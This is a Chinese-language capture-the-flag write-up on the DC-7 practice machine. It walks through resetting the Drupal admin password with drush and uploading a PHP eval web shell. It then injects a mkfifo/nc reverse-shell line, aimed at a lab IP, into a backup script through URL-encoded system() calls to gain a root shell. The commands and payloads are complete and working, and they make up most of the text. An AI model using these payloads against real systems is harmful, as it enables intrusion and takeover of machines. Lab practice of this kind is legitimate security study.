在对靶机DC-7进行渗透测试学习时,发现无法使用介绍的方法echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.23.135 1234 >/tmp/f" >> backups.sh进行反弹shell提权。
前面的步骤与网上介绍的方法一样,这里不做过多阐述。后台账号密码:dc7user/MdR3xOgB7#dW
ssh dc7user@192.168.23.142远程登录dc7user账号,在/var/www/html目录下执行drush user-password admin --password="123456"
登录该网站后台账号密码:admin,123456
手动安装 PHP filter 模块后,上传一句话木马:<?php @eval($_GET['admin']);?>
查看/opt/scripts/backups.sh文件内容:http://192.168.23.142/node/preview/51ffa862-4bd0-494d-bdd4-b2ebbb9afaa4/full?admin=system(%22cat%20/opt/scripts/backups.sh%22);
通过echo将反弹shell语句写入到backups.sh文件:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.23.135 1234 >/tmp/f" >> backups.sh
首先对反弹执行代码进行编译:
rm \/tmp\/f\;mkfifo \/tmp\/f\;cat \/tmp\/f\|\/bin\/sh \-i 2\>\%261\|nc 192.168.23.135 1234 \>\/tmp\/f
通过system写入:
http://192.168.23.142/node/preview/51ffa862-4bd0-494d-bdd4-b2ebbb9afaa4/full?admin=system(%22echo%20rm%20\/tmp\/f\;mkfifo%20\/tmp\/f\;cat%20\/tmp\/f\|\/bin\/sh%20\-i%202\%3E\%261\|nc%20192.168.23.135%201234%20\%3E\/tmp\/f%3E%3E/opt/scripts/backups.sh%22);
查看:
http://192.168.23.142/node/preview/51ffa862-4bd0-494d-bdd4-b2ebbb9afaa4/full?admin=system(%22cat%20/opt/scripts/backups.sh%22);
开一个窗口进行监听:
nc -lvvp 1234监听
在dc7user后台中,在/opt/scripts/目录下执行./backups.sh
反弹shell成功